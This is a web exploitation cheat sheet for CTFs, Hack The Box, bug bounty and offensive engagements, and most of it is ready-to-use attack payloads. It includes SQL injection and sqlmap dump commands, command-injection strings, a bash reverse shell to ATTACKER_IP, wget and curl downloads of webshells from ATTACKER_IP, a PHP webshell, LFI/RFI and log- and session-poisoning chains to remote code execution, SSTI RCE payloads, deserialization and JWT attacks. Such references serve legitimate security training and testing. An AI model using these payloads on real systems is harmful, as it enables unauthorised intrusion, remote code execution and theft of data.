A practical cheat sheet for web exploitation during HTB, CTFs, bug bounty and offensive security engagements.

0. ESSENTIAL WEB EXPLOITATION TOOLS

Core Tools

• BurpSuite (Repeater, Intruder, Proxy)
• sqlmap
• ffuf / wfuzz (fuzzing)
• curl, wget (manual testing)
• gobuster / feroxbuster
• requests + Python scripting
• PayloadsAllTheThings
• SecLists

Quick Webshell Upload Commands

python3 -m http.server 8000
wget http://ATTACKER_IP:8000/shell.php
curl -O http://ATTACKER_IP:8000/shell.aspx

1. SQL INJECTION (SQLi)

Detecting SQLi manually

'
"
')
"))
or 1=1--
or '1'='1'

Boolean-based SQLi

?id=1' AND 1=1--
?id=1' AND 1=2--

UNION-based SQLi

Find column count:

ORDER BY 1--
ORDER BY 2--
ORDER BY 3--

Union:

UNION SELECT 1,2,3--

Extract data:

UNION SELECT username, password, 3 FROM users--

Error-based SQLi (MySQL)

?id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT user()),0x3a,FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--

Time-based SQLi

?id=1' AND SLEEP(5)--

sqlmap basic usage

sqlmap -u "[http://TARGET/page?id=1](http://TARGET/page?id=1)" --batch

Dump DB:

sqlmap -u "[http://TARGET/page?id=1](http://TARGET/page?id=1)" --dump-all

Bypass WAF:

--random-agent --tamper=space2comment

2. COMMAND INJECTION (RCE)

Basic payloads

; ls
&& whoami
| id

Blind command injection

; sleep 5
&& ping -c 5 127.0.0.1

Windows RCE

& whoami
| powershell -c whoami

Web reverse shell

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

3. FILE UPLOAD ATTACKS

Bypass client-side restrictions

• Change extension in Burp
• Remove Content-Type
• Override filename entirely

Common bypass extensions (PHP)

shell.php
shell.php.jpg
shell.phtml
shell.phar

Apache %00 null byte bypass

shell.php%00.jpg

IIS / ASP.NET

shell.aspx
shell.asp;.jpg

Simple PHP webshell

<?php system($_GET['cmd']); ?>

Access:

/uploads/shell.php?cmd=id

4. LFI / RFI (Local & Remote File Inclusion)

4.1 Basic LFI

?page=../../../../etc/passwd
?page=../../../../windows/win.ini

4.2 PHP wrappers

Read a file Base64-encoded

?page=php://filter/convert.base64-encode/resource=./index.php

Convert to string with zlib.inflate

?page=php://filter/zlib.deflate/convert.base64-encode/resource=index.php

Chain multiple wrappers

?page=php://filter/string.strip_tags|convert.base64-encode/resource=index.php

4.3 PHP Filter Chain RCE (Synacktiv)

If the application does:

include($_GET['page'])

Use:

• https://github.com/synacktiv/php_filter_chain_generator

Example generated payload:

php://filter/resource=index.php|convert.iconv.UTF8.UTF7|...

Or RCE via filter chains:

?page=php://filter/convert.base64-encode|convert.iconv.UTF8.UTF7/resource=php://input

Send PHP code in request body:

<?=`id`?>

4.4 Log Poisoning → LFI → RCE

Inject webshell into access log:

curl -A "<?php system($_GET['cmd']); ?>" http://TARGET/

Execute:

?page=/var/log/apache2/access.log&cmd=id

4.5 RFI (if allow_url_fopen = On)

?page=http://ATTACKER_IP/shell.txt

5. DIRECTORY TRAVERSAL & FILE DISCLOSURE

Basic traversal

../../../../etc/passwd
..\..\..\windows\win.ini

Null byte bypass

file=../../../../etc/passwd%00

Nginx path confusion

/static../config.php

6. DESERIALIZATION ATTACKS

PHP

O:8:"Exploit":0:{}

Java (Commons Collections)

java -jar ysoserial.jar CommonsCollections1 "cmd" | base64

Python Pickle

import os
os.system("id")

7. SSTI (Server-Side Template Injection)

Detect SSTI (Jinja2)

{{7*7}}

Jinja2 RCE

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Twig RCE

{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}

8. AUTHENTICATION BYPASS ATTACKS

8.1 JWT Exploitation

alg=none

Edit token:

{"alg":"none"}

Weak HS256 secret

hashcat -a 0 -m 16500 jwt.txt rockyou.txt

KID file inclusion

"kid": "../../../../../../../etc/passwd"

8.2 OAuth2 Misconfigurations

Open redirect

redirect_uri=http://attacker/callback

Token substitution

Replay access_token between clients.

Referer-leakage tricks

Force redirect → steal token.

9. BUSINESS LOGIC VULNERABILITIES

IDOR

/api/user?id=1001 → change id=1000

Mass assignment

{"role":"admin"}

Bypass business validation

Replay modified request in Burp.

10. HEADERS & CACHING ATTACKS

X-Forwarded-For spoofing

X-Forwarded-For: 127.0.0.1

Cache poisoning

/?cb=alert(1)

11. ADVANCED LFI/RFI/RCE TECHNIQUES (ADDED)

11.1 PHP Wrappers Quick Reference

php://filter
php://input
php://stdin
php://memory
php://temp
data://
expect://

11.2 LFI → RCE via php://input

?page=php://input

Send in POST:

<?=`id`?>

11.3 LFI → RCE via session poisoning

If PHP uses sessions:

/var/lib/php/sessions/sess_<PHPSESSID>

Inject payload:

PHPSESSID=<?=`id`?>

Then include:

?page=/var/lib/php/sessions/sess_<ID>

11.4 Using expect:// for direct command exec (if enabled)

?page=expect://id

11.5 LFI on Nginx alias bypass

/static../index.php

11.6 RFI with stream wrappers (if remote fopen enabled)

?page=data://text/plain,<?=`id`?>

Final Notes

This cheat sheet now includes:

• SQL Injection
• Command Injection & RCE
• File Upload exploitation
• LFI / RFI including advanced PHP wrappers
• PHP filter chain exploitation (Synacktiv)
• Log & session poisoning leading to RCE
• Deserialization (PHP, Java, Python)
• SSTI (Jinja2, Twig)
• JWT/OAuth bypass
• Logic flaws

Useful for HTB, CTFs, bug bounty and real-world web exploitation.